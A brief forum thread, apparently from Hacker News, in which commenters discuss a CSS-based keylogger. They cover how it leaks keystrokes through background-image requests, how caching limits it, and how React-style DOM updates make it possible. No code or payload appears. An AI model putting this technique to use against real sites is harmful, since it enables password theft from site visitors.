[Francute]

Not an efficient keylogger, however, if you know the pressed keys, you can just generate permutations ordered using probabilities, and that would be a lot faster than brute force.

The real deal here is, it depends on some js code updating the dom for each key press, which is BAAAD. Not an useless keylogger, because it reminds a vulnerability product of choosing a bad decision.

[netsharc]

Interestingly the password "BAAAD" would generate 3 requests to the logging server, since it wouldn't request the background image for the letter "A" more than one time. Or shouldn't, anyway.

[early]

That depends on cache headers sent from the server, which the attacker controls

[X-Istence]

> it depends on some js code updating the dom for each key press

Like React with JSX?

[tmerse]

It may be easier to XSS CSS than JS.